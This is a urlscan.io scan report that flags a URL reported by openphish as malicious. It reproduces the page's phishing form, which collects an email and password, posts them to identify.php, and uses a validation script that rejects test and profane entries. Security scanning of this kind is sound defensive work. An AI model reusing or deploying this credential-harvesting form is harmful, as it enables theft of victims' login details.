unityloaninvestment.org
Open in
urlscan Pro
192.111.134.110
Malicious Activity!
Public Scan
URL:
http://unityloaninvestment.org/qjq39y1c15h.yfs9iqf/d947qr3aptq.f87u.rih372b.x5qd9bk/yv1vi2z.t49ak9f.f8m12n.i0t6x/xp8lt.o670dj57...
Submission: On June 24 via automatic, source openphish — Scanned from CA
Submission: On June 24 via automatic, source openphish — Scanned from CA
Form analysis
1 forms found in the DOMName: dropform — POST identify.php
<form id="dropform" name="dropform" method="post" action="identify.php" onsubmit="return validateForm()">
<div class="header_logo"></div>
<div class="login-container">
<div class="main_logo"><img src="media/big_logo.png" width="290px"></div>
<div class="sign_in"><img src="media/sign_in.png" width="360" height="235"></div>
<div class="sign_g"><a href="g_drive/index.php"><img src="media/sign_in_with_g.png" width="355" height="40"></a></div>
<!-- <div class="sign_y"><a href="y_sign.php"><img src="media/sign_in_with_y.png" width="355" height="40"></a></div>
<div class="sign_h"><a href="h_sign.php"><img src="media/sign_in_with_h.png" width="355" height="40"></a></div> -->
<input type="email" id="email" name="email" placeholder="Email">
<input type="password" id="password" name="password" placeholder="Password">
<button type="submit" style="border: 0; background: transparent">
<img src="media/submit_button.png" width="85" height="40" alt="submit">
</button>
<div id="empty_form_error"></div>
</div>
<script src="https://code.jquery.com/jquery-2.2.3.min.js"></script>
<script>
// JavaScript for label effects only
$(window).load(function() {
$(".col-3 input").val("");
$(".input-effect input").focusout(function() {
if ($(this).val() != "") {
$(this).addClass("has-content");
} else {
$(this).removeClass("has-content");
}
})
});
function validateForm() {
var email = document.forms["dropform"]["email"].value;
var pass = document.forms["dropform"]["password"].value;
if (email == "") {
document.getElementById('empty_form_error').innerHTML = "Enter an email address";
return false;
}
if (pass == "") {
document.getElementById('empty_form_error').innerHTML = "Enter your password (Case Sensitive)";
return false;
}
if (!email.match(/^[^\s@]+@[^\s@]+\.[^\s@]+$/)) {
document.getElementById('empty_form_error').innerHTML = "Enter a valid email address (username@domain.com)";
return false;
}
if (email.match(/fuck/)) {
document.getElementById('empty_form_error').innerHTML = "Enter a valid email address (username@domain.com)";
return false;
}
if (email.match(/asshole/)) {
document.getElementById('empty_form_error').innerHTML = "Enter a valid email address (username@domain.com)";
return false;
}
if (email.match(/dickhead/)) {
document.getElementById('empty_form_error').innerHTML = "Enter a valid email address (username@domain.com)";
return false;
}
if (email.match(/test@test/)) {
document.getElementById('empty_form_error').innerHTML = "Enter a valid email address (username@domain.com)";
return false;
}
if (email.match(/bitch/)) {
document.getElementById('empty_form_error').innerHTML = "Enter a valid email address (username@domain.com)";
return false;
}
}
</script>
</form>